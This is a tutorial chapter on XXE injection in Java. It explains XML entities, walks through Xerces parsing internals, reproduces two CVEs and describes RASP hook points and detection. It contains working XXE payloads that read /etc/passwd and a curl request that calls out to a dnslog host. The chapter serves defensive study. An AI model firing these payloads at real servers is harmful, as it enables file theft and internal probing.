XXE Injection Principles and Detection

XXE stands for XML External Entity injection. It occurs when an application parses XML input and resolves the external entities declared in it, which can cause the parser to load resources chosen by an attacker. This can lead to file reading, command execution, internal network port scanning, attacks on internal websites, and denial-of-service (DoS) attacks.
This chapter first introduces the basic structure of XML and parsing tools, then explains the exploitation principles and defense strategies of XXE, and finally provides hook points and detection algorithms.

14.1 XML Basics

14.1.1 Basic Structure of XML Documents

XML documents follow specific rules and are organized into components, primarily consisting of three parts: the XML declaration, Document Type Definition (DTD, where XXE vulnerabilities reside), and document elements.

  • XML Declaration (Optional)

An XML document may begin with an XML declaration, which provides metadata about the document itself, such as version number and character encoding. For example:

<?xml version="1.0" encoding="UTF-8"?>
  • Document Type Definition (DTD)

DTD or XML Schema is used to define the valid structure, elements, attributes, and their relationships in a document. A DTD reference might look like this:

<!DOCTYPE rootElement SYSTEM "myDTD.dtd">

Or using XML Schema:

<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- schema definitions go here -->
</xs:schema>
  • Element Structure

Root Element: Every XML document must have exactly one root element, which serves as the container for all other elements.

Child Elements: Elements can contain other elements as their children, forming a hierarchical structure.

Attributes: Elements can have attributes, which are name/value pairs providing additional information about the element.

Text Content: Elements can contain text content or character data (CDATA) sections.

Comments: XML documents can include comments, which do not affect document parsing.

The following XML document includes the basic structure described above:

<?xml version="1.0" encoding="UTF-8"?>
<!-- This XML document example describes a simple book catalog -->
<!DOCTYPE catalog [
<!ELEMENT catalog (book*)>
<!ELEMENT book (title, author+, year, description?)>
<!ATTLIST book id ID #REQUIRED>
<!ELEMENT title (#PCDATA)>
<!ELEMENT author (#PCDATA)>
<!ELEMENT year (#PCDATA)>
<!ELEMENT description (#PCDATA)>
]>
<catalog>
<!-- Book entry starts -->
<book id="bk101">
<title>XML Primer</title>
<author>Zhang San</author>
<author>Li Si</author>
<year>2005</year>
<description><![CDATA[This book is the perfect guide for XML beginners, covering both basic and advanced XML concepts in detail.]]></description>
</book>
<book id="bk102">
<title>Java Programming</title>
<author>Wang Wu</author>
<year>2009</year>
</book>
<!-- Book entry ends -->
</catalog>
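
To make the role of the DTD concrete, the following is a minimal sketch (not part of the original chapter) that validates two small documents against a trimmed-down version of the catalog DTD using the JDK's built-in JAXP parser. The class name `DtdValidationDemo` and the helper `validate` are made up for illustration.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.ErrorHandler;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class DtdValidationDemo {

    // Trimmed-down internal DTD, modeled on the catalog example (illustrative only).
    static final String DTD =
        "<!DOCTYPE catalog [\n"
        + "<!ELEMENT catalog (book*)>\n"
        + "<!ELEMENT book (title, author+, year)>\n"
        + "<!ATTLIST book id ID #REQUIRED>\n"
        + "<!ELEMENT title (#PCDATA)>\n"
        + "<!ELEMENT author (#PCDATA)>\n"
        + "<!ELEMENT year (#PCDATA)>\n"
        + "]>\n";

    /** Parses the XML with DTD validation enabled and returns the validation errors. */
    static List<String> validate(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setValidating(true); // check the document against its DTD
        DocumentBuilder builder = factory.newDocumentBuilder();
        List<String> errors = new ArrayList<>();
        builder.setErrorHandler(new ErrorHandler() {
            @Override public void warning(SAXParseException e) { /* ignored in this sketch */ }
            @Override public void error(SAXParseException e) { errors.add(e.getMessage()); }
            @Override public void fatalError(SAXParseException e) throws SAXParseException { throw e; }
        });
        builder.parse(new InputSource(new StringReader(xml)));
        return errors;
    }

    public static void main(String[] args) throws Exception {
        String valid = DTD + "<catalog><book id=\"bk101\"><title>XML Primer</title>"
            + "<author>Zhang San</author><year>2005</year></book></catalog>";
        // This document omits <year>, which the DTD requires.
        String invalid = DTD + "<catalog><book id=\"bk102\"><title>Java Programming</title>"
            + "<author>Wang Wu</author></book></catalog>";
        System.out.println("valid document errors:   " + validate(valid).size());
        System.out.println("invalid document errors: " + validate(invalid).size());
    }
}
```

The first document satisfies the content model, while the second should be reported as invalid because the `book` element is incomplete.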

14.1.2 XML External Entities

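A DTD (Document Type Definition) defines the legal building blocks of an XML document, and it can be declared inside the document or referenced externally. A DTD can also declare entities, which are named pieces of content that the parser substitutes wherever the document references them. Entities are either internal or external.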

  • Internal Entities
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY bar "hello">
]>
<foo>&bar;</foo>
  • External Entities

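An external entity is declared with the keyword SYSTEM or PUBLIC. SYSTEM is followed by a URI (the system identifier) from which the parser loads the entity's content; PUBLIC is followed by a public identifier and then a system identifier. Example of an external entity: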

<?xml version="1.0"?>
<!DOCTYPE mage[
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<root>&file;</root>

The DTD declares an external entity named ‘file’, which the document body then references. An entity reference has the form &entity_name;. When the parser expands the reference, it replaces it with the content loaded from the entity's system identifier.
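
Entity expansion can be observed with a few lines of Java. The sketch below (an illustration, not code from the original chapter) parses the internal-entity example with the JDK's JAXP `DocumentBuilder`; the class name `InternalEntityDemo` and the helper `rootText` are hypothetical.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class InternalEntityDemo {

    /** Parses the XML and returns the text content of the root element. */
    static String rootText(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
            .newDocumentBuilder()
            .parse(new InputSource(new StringReader(xml)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        String xml = "<!DOCTYPE foo [\n"
            + "<!ELEMENT foo ANY >\n"
            + "<!ENTITY bar \"hello\">\n"
            + "]>\n"
            + "<foo>&bar;</foo>";
        // The parser replaces &bar; with the entity's declared value.
        System.out.println(rootText(xml)); // prints "hello"
    }
}
```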

14.2 External Entity Parsing Source Code Analysis

14.2.1 External Entity Injection for File Reading

An xxe.xml document containing external entity injection is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY firstname SYSTEM "file:///etc/passwd" >
]>
<user>
<firstname>&firstname;</firstname>
<lastname>lastname</lastname>
</user>

Using Dom4j to parse the above XML document, the code is as follows:

import org.dom4j.Document;
import org.dom4j.Element;
import org.dom4j.io.SAXReader;
import java.io.File;

public class Main {
    public static void main(String[] args) throws Exception {
        // Parse xxe.xml with dom4j's default SAXReader configuration
        File file = new File("src/main/resources/xxe.xml");
        Document doc = new SAXReader().read(file);
        Element rootElement = doc.getRootElement();
        // The text of <firstname> is the expanded external entity
        System.out.println(rootElement.element("firstname").getText());
    }
}

Output:

##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
//...Output truncated due to space limitations
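
The same behavior can be reproduced without dom4j. The following sketch uses only the JDK's built-in JAXP parser and a harmless temporary file in place of /etc/passwd. It assumes a JDK with default JAXP settings, where external general entities are resolved; the class and method names are made up for illustration.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class ExternalEntityDemo {

    /** Builds an XXE payload whose external entity points at the given file. */
    static String payloadFor(Path target) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
            + "<!DOCTYPE foo [\n"
            + "<!ENTITY firstname SYSTEM \"" + target.toUri() + "\" >\n"
            + "]>\n"
            + "<user><firstname>&firstname;</firstname><lastname>lastname</lastname></user>";
    }

    /** Parses the payload with an unhardened parser and returns the <firstname> text. */
    static String parseFirstname(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
            .newDocumentBuilder()
            .parse(new InputSource(new StringReader(xml)));
        return doc.getElementsByTagName("firstname").item(0).getTextContent();
    }

    /** Writes the secret to a temp file, reads it back through the entity, then cleans up. */
    static String readViaEntity(String secret) throws Exception {
        Path file = Files.createTempFile("xxe-demo", ".txt");
        try {
            Files.write(file, secret.getBytes(StandardCharsets.UTF_8));
            return parseFirstname(payloadFor(file));
        } finally {
            Files.delete(file);
        }
    }

    public static void main(String[] args) throws Exception {
        // With default (assumed) JAXP settings, the file content ends up in the parsed document.
        System.out.println(readViaEntity("demo-secret"));
    }
}
```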

14.2.2 Source Code Analysis and Debugging

The complete process of dom4j reading and parsing XML documents consists of three main steps:

14.2.2.1 XML File Path Processing

The main job of the SAXReader.read method is to obtain the absolute path of the XML file on disk and set it as the resource path of the input source object.

Figure 14-1 SAXReader Reading Disk File

The relative path of xxe.xml is src/main/resources/xxe.xml. At line 308 of the code in Figure 14-1, the method obtains the file's absolute path on disk and sets it, in URL form, as the inputSource’s resource path. At line 325, it calls an overloaded version of the SAXReader.read method.

14.2.2.2 Creating the XMLReader Object

2.jpg

At line 464, the getXMLReader method is called to create an XMLReader object, which is key to parsing XML documents. Debugging into its implementation shows the critical code that creates the XMLReader:

3.jpg

At line 46, an instance of SAXParserFactory is obtained, and the factory instance’s newSAXParser method is called. Since SAXParserFactory is an abstract class, let’s see how the factory class is instantiated. Its initialization code: 4.jpg

From the code, we can see the factory implementation is SAXParserFactoryImpl. Let’s examine its newSAXParser method implementation: 5.jpg

In the newSAXParser method, a SAXParserImpl object is created, after which its getXMLReader method is called, as shown below: 6.jpg

The initialization of xmlReader occurs in the SAXParserImpl constructor. Let’s examine the constructor method of SAXParserImpl: 7.jpg

At this point, the class responsible for XML parsing is JAXPSAXParser, which is a subclass of SAXParser. Its UML class diagram is as follows:

8.jpg
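
The classes named in this walkthrough can be checked without a debugger. The sketch below is an illustration that assumes the JDK's bundled JAXP implementation is the one on the classpath; it prints the concrete classes behind SAXParserFactory, SAXParser, and XMLReader. The class name `ParserImplDemo` is hypothetical.

```java
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.XMLReader;

public class ParserImplDemo {

    /** Returns the concrete class names of the factory, the parser, and the XMLReader. */
    static String[] implementationClasses() throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        SAXParser parser = factory.newSAXParser();
        XMLReader reader = parser.getXMLReader();
        return new String[] {
            factory.getClass().getName(),
            parser.getClass().getName(),
            reader.getClass().getName()
        };
    }

    public static void main(String[] args) throws Exception {
        // Expect names ending in SAXParserFactoryImpl, SAXParserImpl, and SAXParserImpl$JAXPSAXParser.
        for (String name : implementationClasses()) {
            System.out.println(name);
        }
    }
}
```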

14.2.2.3 XML Document Parsing

After the xmlReader object is created, reading of the XML document begins. From the UML class diagram above, we can see that the actual parsing class is JAXPSAXParser, an inner class of SAXParserImpl. Its parse method is as follows:

Xnip2024-07-08_09-35-58.jpg

It actually calls its parent class’s parse method, implemented as:

Xnip2024-07-08_09-36-36.jpg

At line 1216, we can see it actually calls the parse method of the XMLParser class:

Xnip2024-07-08_09-37-21.jpg

In this method, fConfiguration is responsible for parsing the XML. Its declared type is the interface XMLParserConfiguration, whose UML class diagram is as follows:

Xnip2024-07-08_09-52-09.jpg

We can see that the actual parsing class is XML11Configuration, with relevant methods as follows:

Xnip2024-07-08_09-38-45.jpg

Xnip2024-07-08_09-40-00.jpg

Here it actually calls fCurrentScanner.scanDocument, where the actual document scanning begins:

Xnip2024-07-08_09-57-19.jpg

Looking at the next method, we can see that it parses the XML document into individual events:

Xnip2024-07-08_10-44-55.jpg

Our main focus is on the parsing of entity references: Xnip2024-07-08_10-48-35.jpg

When scanning entity references, the scanEntityReference method is called. The code for this method is as follows:

Xnip2024-07-08_10-57-50.jpg

At line 1238, the startEntity method is called to parse the entity.

Xnip2024-07-08_10-50-25.jpg

Xnip2024-07-08_10-51-33.jpg

The setupCurrentEntity method is responsible for parsing entity resources, implemented as follows:

Xnip2024-07-08_10-52-48.jpg

At this point, the debugging of the external entity reference parsing process in XML documents is complete.

14.3 XXE Vulnerability Examples

14.3.1 CVE-2018-15531

  • Vulnerability Overview

JavaMelody is a monitoring tool for Java applications and application servers (Tomcat, JBoss, WebLogic) in production and QA environments. It presents monitoring data as charts, helping development and operations teams identify performance bottlenecks and improve response times. Version 1.74.0 fixed an XXE vulnerability, tracked as CVE-2018-15531, which attackers could exploit to read sensitive information on the JavaMelody server.

  • Affected Versions

Versions < 1.74.0

  • Fix Code

Figure JavaMelody fix code commit

Commit link: https://github.com/javamelody/javamelody/commit/ef111822562d0b9365bd3e671a75b65bd0613353

  • Vulnerability Environment Setup

Create a simple Spring Boot project and add the javamelody dependency at the affected version to pom.xml.

<dependency>
<groupId>net.bull.javamelody</groupId>
<artifactId>javamelody-spring-boot-starter</artifactId>
<version>1.73.1</version>
</dependency>

After starting the application, access the monitoring page at http://localhost:8080/monitoring. The result is as follows:

Figure JavaMelody monitoring page

  • Obtain a DNSLog Domain

Domain: 4yf5lc.dnslog.cn

Figure Domain obtained from dnslog.cn

The request is sent as follows:

curl --location --request POST 'http://localhost:8080' \
--header 'Content-type: text/xml' \
--header 'SOAPAction: aaaaa' \
--data-raw '<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://www.4yf5lc.dnslog.cn">
%remote;
]>
</root>'

Alternatively, you can send the request using Postman:

Figure Sending Request via Postman

  • Observe the Results

You can see that the dnslog.cn platform has recorded the server’s IP information.

Figure XXE Attack Result

Partial logs intercepted by RASP are shown below:

Figure XXE Attack Result

14.3.2 CVE-2018-1259

  • Vulnerability Overview

XMLBeam is a Java library that projects parts of an XML document onto Java interfaces; Spring Data Commons uses it to bind XML request payloads. When used in combination with XMLBeam 1.4.14 or earlier versions, Spring Data Commons versions 1.13 to 1.13.11 and 2.0 to 2.0.6 do not restrict XML external entity references. This allows an unauthenticated remote attacker to supply crafted request parameters to Spring Data’s projection-based request payload binding and access arbitrary files on the system.

  • Affected Versions

Spring Data Commons 1.13 to 1.13.11
Spring Data REST 2.6 to 2.6.11
Spring Data Commons 2.0 to 2.0.6
Spring Data REST 3.0 to 3.0.6

  • Vulnerability Analysis

The fix commit modifies the DefaultXMLFactoriesConfig file, as shown below:

Figure XMLBeam fix code commit

commit: https://github.com/SvenEwald/xmlbeam/commit/f8e943f44961c14cf1316deb56280f7878702ee1

The changes set secure default features on the XML factories, turn off the expansion of entity references, and disable XInclude processing, which would otherwise merge multiple XML documents.
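
The effect of this kind of fix can be illustrated with plain JAXP. The sketch below is not the XMLBeam commit's code; it is a generic hardening of `DocumentBuilderFactory` that uses the standard Xerces/SAX feature names, written under the assumption that the JDK's bundled parser is in use. The class and method names are hypothetical.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class HardenedParserDemo {

    /** Creates a factory that rejects DOCTYPE declarations and never loads external entities. */
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Reject any document that contains a DOCTYPE declaration.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth: do not resolve external general or parameter entities.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setXIncludeAware(false);           // no XInclude merging
        factory.setExpandEntityReferences(false);  // do not expand entity references
        return factory;
    }

    /** Returns true if the hardened parser refuses the document. */
    static boolean isRejected(String xml) throws Exception {
        try {
            hardenedFactory().newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        String payload = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE foo [<!ENTITY file SYSTEM \"file:///etc/passwd\">]>\n"
            + "<user><firstname>&file;</firstname></user>";
        System.out.println("payload rejected: " + isRejected(payload));
        System.out.println("plain XML rejected: " + isRejected("<user><firstname>a</firstname></user>"));
    }
}
```

Disallowing the DOCTYPE declaration outright is the strictest option; applications that genuinely need DTDs would have to rely on the remaining settings instead.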

  • Reproduction

The code comes from the official spring-data-examples project (demo: spring-data-xml-xxe). The key sections are as follows:

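import org.springframework.data.web.JsonPath;
import org.springframework.data.web.ProjectedPayload;
import org.springframework.http.HttpEntity;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;
import org.xmlbeam.annotation.XBRead;

@RestController
class UserController {

    // Projection interface: Spring Data binds the request body to it,
    // using XMLBeam (@XBRead) for XML and JsonPath for JSON payloads.
    @ProjectedPayload
    public interface UserPayload {
        @XBRead("//firstname")
        @JsonPath("$..firstname")
        String getFirstname();

        @XBRead("//lastname")
        @JsonPath("$..lastname")
        String getLastname();
    }

    @PostMapping(value = "/")
    HttpEntity<String> post(@RequestBody UserPayload user) {
        return ResponseEntity
            .ok(String.format("Received firstname: %s, lastname: %s", user.getFirstname(), user.getLastname()));
    }
}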

Project pom.xml dependencies:

<dependency>
<groupId>org.springframework.data</groupId>
<artifactId>spring-data-commons</artifactId>
<version>2.0.5.RELEASE</version>
</dependency>
<dependency>
<groupId>com.jayway.jsonpath</groupId>
<artifactId>json-path</artifactId>
</dependency>
<dependency>
<groupId>org.xmlbeam</groupId>
<artifactId>xmlprojector</artifactId>
<version>1.4.13</version>
</dependency>

If you are familiar with creating Spring Boot projects, the code above is enough to build a complete application. Once the project is set up, package it as an executable jar and run it:

mvn clean package
java -jar ./target/xxe-demo-0.0.1-SNAPSHOT.jar
  • Sending Requests

Send an XML payload via POST to read an arbitrary file. Example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<user><firstname>&file;</firstname><lastname>rasp</lastname></user>

Send the request using Postman as shown below:

Figure Sending request with Postman

  • Observing Results

Partial logs intercepted by RASP are as follows:

Figure XXE attack results

14.4 Hook Point Selection and Detection Algorithm

14.4.1 Hook Class Selection

Although there are many XML parsing libraries, it is sufficient to hook the code that resolves XML entities. For example, both dom4j and JAXP rely on Apache Xerces for XML entity parsing. The relevant hook points are summarized as follows:

  • Open-source tool apache.xerces

org.apache.xerces.impl.XMLEntityManager#startEntity(String, org.apache.xerces.xni.parser.XMLInputSource, boolean, boolean)

Open-source tool org.apache.xerces

  • Apache Xerces tool within JDK

com.sun.org.apache.xerces.internal.impl.XMLEntityManager#startEntity(boolean, String, com.sun.org.apache.xerces.internal.xni.parser.XMLInputSource, boolean, boolean)

Built-in apache.xerces tool in JDK

It can be observed that besides the difference in package names, there are also some variations in the parameter lists between the two hook points mentioned above.

  • Open-source tool wstx

com.ctc.wstx.sr.StreamScanner#expandEntity(com.ctc.wstx.ent.EntityDecl, boolean)

Open-source tool com.ctc.wstx
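
A real RASP agent hooks the methods above through bytecode instrumentation, which is beyond a short example. As a stand-in, the sketch below uses the standard SAX `EntityResolver` callback to show what information is available when the parser is about to load an external entity: the system identifier of the resource. This is an assumption-laden illustration, not the hook implementation itself, and the class and method names are hypothetical.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

public class EntityObserverDemo {

    /** Parses the XML and returns the system identifiers of all external entities it tried to load. */
    static List<String> observe(String xml) throws Exception {
        List<String> seen = new ArrayList<>();
        DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        builder.setEntityResolver((publicId, systemId) -> {
            seen.add(systemId); // a hook would run its detection logic here
            // Return empty content so that the real resource is never opened.
            return new InputSource(new StringReader(""));
        });
        builder.parse(new InputSource(new StringReader(xml)));
        return seen;
    }

    public static void main(String[] args) throws Exception {
        String xml = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE foo [\n"
            + "<!ENTITY file SYSTEM \"file:///etc/passwd\">\n"
            + "]>\n"
            + "<root>&file;</root>";
        System.out.println(observe(xml));
    }
}
```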

14.4.2 Detection Algorithm

In Java, XXE can be exploited only through a limited set of protocols, all of which are implemented under the sun.net.www.protocol package. The protocols supported by JDK8 and JDK11 are as follows:

JDK11: jmod, jrt, mailto, file, ftp, http, https, jar;

JDK8: mailto, netdoc, file, ftp, http, https, jar;

Detection obtains the protocol name, path, and host name of the external entity resource and checks each of them.

The method to obtain parameters is shown below:

Xnip2024-05-11_08-21-13.jpg

The algorithm for parameter detection is as follows:

Xnip2024-07-09_08-17-48.jpg
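
Since the algorithm itself is only shown as a screenshot, the following is a hypothetical sketch of what such a check could look like, not the author's implementation. It assumes the input is the absolute system identifier of the entity, splits it into protocol, host, and path with `java.net.URI`, and applies an illustrative policy: local-resource protocols are always flagged, and network protocols are flagged unless the host is on a trusted list. The protocol groupings and the trusted-host list are assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

public class XxeDetectionSketch {

    // Hypothetical policy: protocols that read resources local to the server.
    static final Set<String> LOCAL_PROTOCOLS =
        new HashSet<>(Arrays.asList("file", "netdoc", "jar", "jrt", "jmod"));
    // Hypothetical policy: protocols that make the server contact another host.
    static final Set<String> NETWORK_PROTOCOLS =
        new HashSet<>(Arrays.asList("http", "https", "ftp", "mailto"));

    /** Returns true if loading the given external entity should be treated as an attack. */
    static boolean isSuspicious(String systemId, Set<String> trustedHosts) {
        URI uri;
        try {
            uri = new URI(systemId);
        } catch (URISyntaxException e) {
            return true; // unparsable identifiers are flagged
        }
        String protocol = uri.getScheme();
        if (protocol == null) {
            return true; // an absolute identifier is assumed, so a missing protocol is flagged
        }
        protocol = protocol.toLowerCase(Locale.ROOT);
        if (LOCAL_PROTOCOLS.contains(protocol)) {
            return true; // e.g. file:///etc/passwd, whatever the path is
        }
        if (NETWORK_PROTOCOLS.contains(protocol)) {
            String host = uri.getHost(); // null for opaque URIs such as mailto:
            return host == null || !trustedHosts.contains(host.toLowerCase(Locale.ROOT));
        }
        return true; // unknown protocol
    }

    public static void main(String[] args) {
        Set<String> trusted = Collections.singleton("www.w3.org");
        System.out.println(isSuspicious("file:///etc/passwd", trusted));
        System.out.println(isSuspicious("http://www.4yf5lc.dnslog.cn", trusted));
        System.out.println(isSuspicious("https://www.w3.org/2001/xml.xsd", trusted));
    }
}
```

A production check would likely also inspect the path (for example, to allow specific local DTD files), which this sketch leaves out for brevity.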